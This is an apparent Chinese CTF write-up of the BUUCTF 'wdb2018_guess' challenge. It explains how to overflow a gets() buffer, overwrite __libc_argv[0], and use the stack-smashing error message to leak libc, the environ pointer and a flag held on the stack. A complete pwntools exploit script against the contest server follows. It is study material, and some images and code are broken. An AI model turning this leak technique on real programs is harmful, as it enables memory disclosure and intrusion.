现在生态感觉越来越差了,图片上传很不友好
原文:http://blog.joe1sn.top/2020/BUUCTF/#wdb2018_guess
一道思路清奇的题
checksec
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)反汇编
IDA.png
可以看出
1.flag文件被读取到了栈上面
2.主程序创建(
fork)了三个线程3.在这个线程里面,程序将我们的输入和站上面的flag进行比较
4.我们输入的时候调用了
gets,导致栈溢出
GDB调试
- 1. 输入后,在
strcmp断点
gdb-1.png
我们溢出0x128就可以覆盖 _libc_arg[0] 的值,从而泄露数据
-
2. 找到flag的内存位置
这个我们可以从环境变量入手,找到_libc_environ,然后再根据相对偏移找到flag在栈上的地址
知识点
程序开启了canary保护,这里有个之前我忽略的点 canary的检查报错
源码如下
void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
__fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
/* The loop is added only to keep gcc happy. */
while (1)
__libc_message (2, "*** %s ***: %s terminated\n",
msg, __libc_argv[0] ?: "");
}
程序输出的时候使用了 __libc_argv[0] 来打印程序的名称,所以就可以从这里泄露一些信息
这里拓展一下
argc:命令的条数
argv[]:输入的每条命令
#include
using std::cout;
using std::cin;
using std::endl;
int main(int argc, char *argv[])
{
for (int i = 0; i < argc; ++i)
cout< 输出
[图片上传失败...(image-e285bc-1599978308685)]
那么argv[0]=程序的名称(也是第0条指令)
_libc_environ
在libc中保存了一个函数叫_environ,存的是当前进程的环境变量
如何从libc地址得到栈地址这里面就详细写了这个函数
arg-2.png
攻击步骤
1. 泄露libc
2. 泄露_libc_arg的表头 environ,从而找到flag在站上面的地址
3. 覆盖 libc_arg[0]为flag在栈上面的地址,最后通过 stack_smashing 泄露出flag
EXP
from pwn import *
name = "guess"
elf = ELF(name)
# libc = ELF("/lib/i386-linux-gnu/libc.so.6")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("libc-2.23.so")
sh = 0
def main(ip,port,debug,mode):
global sh
if debug==0:
context.log_level = "debug"
else:
pass
if mode==0:
sh = process(name)
else:
sh = remote(ip,port)
payload = "A"*0x128
payload += p64(elf.got["read"])
sh.sendlineafter("Please type your guessing flag\n",payload)
sh.recvuntil('stack smashing detected ***: ')
libc_base = u64(sh.recv(6).ljust(8,'\x00'))-libc.sym["read"]
system = libc_base + libc.sym["system"]
environ = libc_base+libc.sym['__environ']
info("libc base -> "+hex(libc_base))
info("libc_system -> "+hex(system))
info("__libc_environ -> "+hex(environ))
payload = "A"*0x128
payload += p64(environ)
sh.sendlineafter("Please type your guessing flag\n",payload)
en_list = u64(sh.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
info("environ -> "+hex(en_list))
payload="A"*0x128
payload += p64(en_list-0x168)
sh.sendlineafter("Please type your guessing flag\n",payload)
sh.recvuntil("*** stack smashing detected ***: ")
print sh.recvline()
if __name__ == '__main__':
main("node3.buuoj.cn","26263",1,1)